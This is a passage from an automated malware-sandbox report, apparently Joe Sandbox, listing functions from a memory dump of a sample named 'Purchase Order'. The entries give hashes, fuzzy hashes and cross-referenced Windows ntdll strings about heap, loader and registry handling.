                                              • Instruction ID: 67c3e700c41299a1518de7b062775413fdacd3e99b258f4923568ffc0adfc503
                                              • Opcode Fuzzy Hash: 6d1eb02b3bf32ab389ebe234347e9044b67a83054a9f2069836f99fe3d2939df
                                              • Instruction Fuzzy Hash: 6331CF7A210214EFE711CB98CCC1F56B3E9EF046A4F54439AF411DB2A1EA70EC85CE65
                                              Function 34809148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: 9b2c0bffef7e1240d09d06821c3c6d5f19ee4eff3328ab171ab5cc4f3d250c8a
                                              • Instruction ID: 3339cf7b31e6bc7f1098e42063fafdfea6f0dfac3df860c06dfea39c8b510267
                                              • Opcode Fuzzy Hash: 9b2c0bffef7e1240d09d06821c3c6d5f19ee4eff3328ab171ab5cc4f3d250c8a
                                              • Instruction Fuzzy Hash: F131C376611118EFD701CB88CC84F9AB7BDEF44768F108255E925AB291EB74DD81CE60
                                              Function 34817152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 07d674190421ebd37c20e7da22d5da9e98c9d8be8ad96bcf9c8ba56e9d41b563
                                              • Instruction ID: 833e58a89a160afb0f71b63c8fed329ed4005a4758d5cecf55fc9277a1a56ea5
                                              • Opcode Fuzzy Hash: 07d674190421ebd37c20e7da22d5da9e98c9d8be8ad96bcf9c8ba56e9d41b563
                                              • Instruction Fuzzy Hash: A251CF35A00709EFFB05CB68C954BADBBB8FF44395F10426EE41293790EBB49951CB80
                                              Function 348117EC Relevance: 4.3, Strings: 3, Instructions: 520COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 3486F8AA
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3486F8CC
                                              • HEAP: , xrefs: 3486F8B7
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 0deb6ef43c89569ac8f0731ae91b8eb28be70df55c2c34f9b2b0d35cd427986a
                                              • Instruction ID: 86e2674000b9146eafae1078cc36172a2dc72ad5cb110555357fedc9080be6a0
                                              • Opcode Fuzzy Hash: 0deb6ef43c89569ac8f0731ae91b8eb28be70df55c2c34f9b2b0d35cd427986a
                                              • Instruction Fuzzy Hash: 1512D074704356EFE705CF24C080B66BBE5FF49348F54869EE69A8B285E774E881CB90
                                              Function 34811460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 34811712
                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 34811728
                                              • HEAP: , xrefs: 34811596
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: cb4778e0883b949c5ef96f9f2ebd146c0f61678712d3800edc68e6c9bdf45e44
                                              • Instruction ID: a3a6a0033998934a3a082e20dac367b42d88f5ae7f2b88f987662ee7ed976c5c
                                              • Opcode Fuzzy Hash: cb4778e0883b949c5ef96f9f2ebd146c0f61678712d3800edc68e6c9bdf45e44
                                              • Instruction Fuzzy Hash: 46E10074A043459FEB15CF68C491BBABBF6AF48304F148A5EE5968B246EB34E840CB50
                                              Function 3480A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: FilterFullPath$UseFilter$\??\
                                              • API String ID: 0-2779062949
                                              • Opcode ID: 7ce4fdca67477ff696d4819d3bfe56dd5334f5fe19d6dc9e3453280f12b77a45
                                              • Instruction ID: 985bbc9e2e373ef9ba67607b60532d592a6b91a3ae7378ec8b4c8e787978899f
                                              • Opcode Fuzzy Hash: 7ce4fdca67477ff696d4819d3bfe56dd5334f5fe19d6dc9e3453280f12b77a45
                                              • Instruction Fuzzy Hash: E0A19E759112289FEB71DF68CC88BDAB7B8EF44714F0042E9EA09A7210D7399E84CF50
                                              Function 34897410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                              • API String ID: 0-3870751728
                                              • Opcode ID: d4a2c2f1e80fa935495ef357984c1f937ccac3790ac1d15314d9f0cd2dc08237
                                              • Instruction ID: 490e7b5d50a6dfadbed18af1980a2ff5d9778acbb63d32803e0336c160a55339
                                              • Opcode Fuzzy Hash: d4a2c2f1e80fa935495ef357984c1f937ccac3790ac1d15314d9f0cd2dc08237
                                              • Instruction Fuzzy Hash: 8F9139B4E00609DFEB55CF68C880BADBBF1BF48314F14826AE915AB391E7759842CF54
                                              Function 3484909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$&$@
                                              • API String ID: 0-1537733988
                                              • Opcode ID: 0f0880b72ed7fa1747c59854f7ee86f6ed8956920dfdec64e29a9806e8e84987
                                              • Instruction ID: 8152e7319ebd170cad7e9405ee3d63a6e573e77ab8af3dfb5b391b66d88626d1
                                              • Opcode Fuzzy Hash: 0f0880b72ed7fa1747c59854f7ee86f6ed8956920dfdec64e29a9806e8e84987
                                              • Instruction Fuzzy Hash: 5971687460D349DFE324CF24C980A0ABBEABF89758F104B1DE4A957690DB71D906CF92
                                              Function 348EB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                              Download Yara Rule
                                              Strings
                                              • TargetNtPath, xrefs: 348EB82F
                                              • GlobalizationUserSettings, xrefs: 348EB834
                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 348EB82A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: 24e1b62224a3d5577660823b6e11ea6f5cd9087334e0b52203c17dcf043f9b16
                                              • Instruction ID: eed60e4f73d4f615066f3858a3f5767a64362d082ec6b77f99d3d6fa0fdc7c42
                                              • Opcode Fuzzy Hash: 24e1b62224a3d5577660823b6e11ea6f5cd9087334e0b52203c17dcf043f9b16
                                              • Instruction Fuzzy Hash: AD614372942229AFDB31DF58DC88BE9B7B8EF05750F4102E9A608A7251D7749EC4CF90
                                              Function 3480F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP[%wZ]: , xrefs: 3486E6A6
                                              • HEAP: , xrefs: 3486E6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3486E6C6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: 5ceaaebcc12d8b034160fb68376deeb438cbc2fece7a07c4dd2b037de1adf467
                                              • Instruction ID: ac81ac19cbbb3828b6638af085b6a50f4e8929bd76f947fe3b97a53f7aa83740
                                              • Opcode Fuzzy Hash: 5ceaaebcc12d8b034160fb68376deeb438cbc2fece7a07c4dd2b037de1adf467
                                              • Instruction Fuzzy Hash: 6E51E175714784EFF312CBA8C954B96BBF8AF05344F0482A5E6518B292D7B8E940DF10
                                              Function 348315F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpCompleteMapModule, xrefs: 3487A590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 3487A589
                                              • minkernel\ntdll\ldrmap.c, xrefs: 3487A59A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: 65e0599cd202dced1915eca683e470d6755b5457d7b50b1abc478fbc3411f18a
                                              • Instruction ID: 32fc0c7e2dbcfc2fe99780b09cf23f0db520f92dc0468ecb9265cc7dcd463da8
                                              • Opcode Fuzzy Hash: 65e0599cd202dced1915eca683e470d6755b5457d7b50b1abc478fbc3411f18a
                                              • Instruction Fuzzy Hash: 3351E178705745DFF711CAA8C950B4A7BE8EF00B54F1803A9E9619B6E1EB74ED41CB80
                                              Function 3480758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              • Opcode ID: 5b8e261bfa80945146a769e025bb50501cdbd6252d004fbe1bb0dbd4f6392cbb
                                              • Instruction ID: 073b9b5385ac6b38b92f62cb97b306611e1c62e90def3fe81c806a833ee4e76d
                                              • Opcode Fuzzy Hash: 5b8e261bfa80945146a769e025bb50501cdbd6252d004fbe1bb0dbd4f6392cbb
                                              • Instruction Fuzzy Hash: 4E4138B4310340AFFB55DA5CC880BA577E4DF02388F5487ADD9574F242DA68D486CF12
                                              Function 348416CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpAllocateTls, xrefs: 34881B40
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 34881B39
                                              • minkernel\ntdll\ldrtls.c, xrefs: 34881B4A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              • Opcode ID: a0f5af60087f4af7b13985412723eadf49fd52b37cf579c3fd745cce0bfc617b
                                              • Instruction ID: d8eb6a17e233ec690383e54876d206395d689b1fdd5bde63aa798e8b157da07b
                                              • Opcode Fuzzy Hash: a0f5af60087f4af7b13985412723eadf49fd52b37cf579c3fd745cce0bfc617b
                                              • Instruction Fuzzy Hash: 744178B5A01608EFEB15CFA9C840BAEBBF5FF48314F408219E415A7314EB75A880CF90
                                              Function 348CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                              Download Yara Rule
                                              Strings
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 348CC1C5
                                              • PreferredUILanguages, xrefs: 348CC212
                                              • @, xrefs: 348CC1F1
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                              • API String ID: 0-2968386058
                                              • Opcode ID: b980d3a5eafe1066b784bff351b65da33441b611093cbc48533b614b89e799fa
                                              • Instruction ID: 758a98e1b5fa8f152dc634c0fe2d00a8b394c46b07fbc24b56fbdbdee10ff590
                                              • Opcode Fuzzy Hash: b980d3a5eafe1066b784bff351b65da33441b611093cbc48533b614b89e799fa
                                              • Instruction Fuzzy Hash: B8416F76E00209EFEB11DAD8C890BEEFBB8AB04B54F50426AE515A7250D7B4DE44CB90
                                              Function 3481A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 3481A2FB
                                              • PS~4, xrefs: 3481A348
                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 3481A309
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PS~4$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                              • API String ID: 0-91862635
                                              • Opcode ID: 4b7bb85accda36fc13edd05b9a0b5de13ec4cdc9c53e4acee9ce1b5dcccb4089
                                              • Instruction ID: 9a175643b7bde16a8589dd7ca1abe5f826bef21e4a657476be15b4239a819c0e
                                              • Opcode Fuzzy Hash: 4b7bb85accda36fc13edd05b9a0b5de13ec4cdc9c53e4acee9ce1b5dcccb4089
                                              • Instruction Fuzzy Hash: 294190B5A04749DFEB01CF6DC850B997BB8FF85750F1042AAE814DB251E775DA40CB50
                                              Function 3489B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                              Download Yara Rule
                                              Strings
                                              • @, xrefs: 3489B670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3489B632
                                              • GlobalFlag, xrefs: 3489B68F
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              • Opcode ID: 18d48d9afc1e279284729ff767569bee7c5928d0b1935e633e38d485a58b9557
                                              • Instruction ID: 40c05a886ac46c35d80b83e606b055b6625f4da8c45e2a9573428d59f5f66dee
                                              • Opcode Fuzzy Hash: 18d48d9afc1e279284729ff767569bee7c5928d0b1935e633e38d485a58b9557
                                              • Instruction Fuzzy Hash: BF315CB5D00609AFEB01DF98DC80AEEBBB8FF44744F400569EA15A7250D774AE44CBA4
                                              Function 34841607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializeTls, xrefs: 34881A47
                                              • minkernel\ntdll\ldrtls.c, xrefs: 34881A51
                                              • DLL "%wZ" has TLS information at %p, xrefs: 34881A40
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: 558401463cc5d06028d4d8caf043209c0377bdb527d44dfe1665c61326e6784f
                                              • Instruction ID: a71f0de5fcaff7961809bbfd0c8ab97540633778fd2b0c5a52c2d74f258b3217
                                              • Opcode Fuzzy Hash: 558401463cc5d06028d4d8caf043209c0377bdb527d44dfe1665c61326e6784f
                                              • Instruction Fuzzy Hash: F331D5B1A10318EFF790CB59CC49F6A76A9EB41764F040219E501B7380DB70ED818BA4
                                              Function 348920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializationFailure, xrefs: 348920FA
                                              • minkernel\ntdll\ldrinit.c, xrefs: 34892104
                                              • Process initialization failed with status 0x%08lx, xrefs: 348920F3
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2986994758
                                              • Opcode ID: ae3b5608313b4dd09a46916116cc470cafe0bbd6347f6fa802ce75badeefb973
                                              • Instruction ID: 40860b17ca6f9e88cae4f7f026a977728f06219d34eb2fb84bf2fbfa2c773b2a
                                              • Opcode Fuzzy Hash: ae3b5608313b4dd09a46916116cc470cafe0bbd6347f6fa802ce75badeefb973
                                              • Instruction Fuzzy Hash: 29F0C275640608AFF720D65CCC42FE93BA8FB40B54F900599F600BB381D6B1A991CA95
                                              Function 348074B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              • Opcode ID: 198848987112838b4bf91ddb70f06ea21905b03b662b7278664b41c40b9a792f
                                              • Instruction ID: 25264f3381016c6b2c2e8842e4fd7425163410c2a45b827563d62a2a7bf6e7f6
                                              • Opcode Fuzzy Hash: 198848987112838b4bf91ddb70f06ea21905b03b662b7278664b41c40b9a792f
                                              • Instruction Fuzzy Hash: 9341D375B11345EFEB02CF68C8907EDBBA2FF46654F048359D9626B280CB38D941CB90
                                              Function 34817703 Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c405ca2c7714614b09a37f6f00d6c9918ba476e6b0256e31bd2af4fe5d7fb35
                                              • Instruction ID: 765c9d304bebe359094338f0e0e1dfd93d41f86e221ac3d2cbf8201b7583e0af
                                              • Opcode Fuzzy Hash: 3c405ca2c7714614b09a37f6f00d6c9918ba476e6b0256e31bd2af4fe5d7fb35
                                              • Instruction Fuzzy Hash: 20614075A0460AEFEB08DF78C490A9DFBB5FF88240F14866ED529A7350DB70A941CB94
                                              Function 348252A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2478675195.00000000347E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347E0000, based on PE: true
                                              • Associated: 00000005.00000002.2478675195.0000000034909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003490D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2478675195.000000003497E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_347e0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: aae494caf8d0e96874dea4805a4a39c3ac5be2efd8faaab23f463bc0b5907ddc
                                              • Instruction ID: c5778f695f6829802b298b639e75c229b9afad8948d3ce18568b3a1dabd5affa
                                              • Opcode Fuzzy Hash: aae494caf8d0e96874dea4805a4a39c3ac5be2efd8faaab23f463bc0b5907ddc
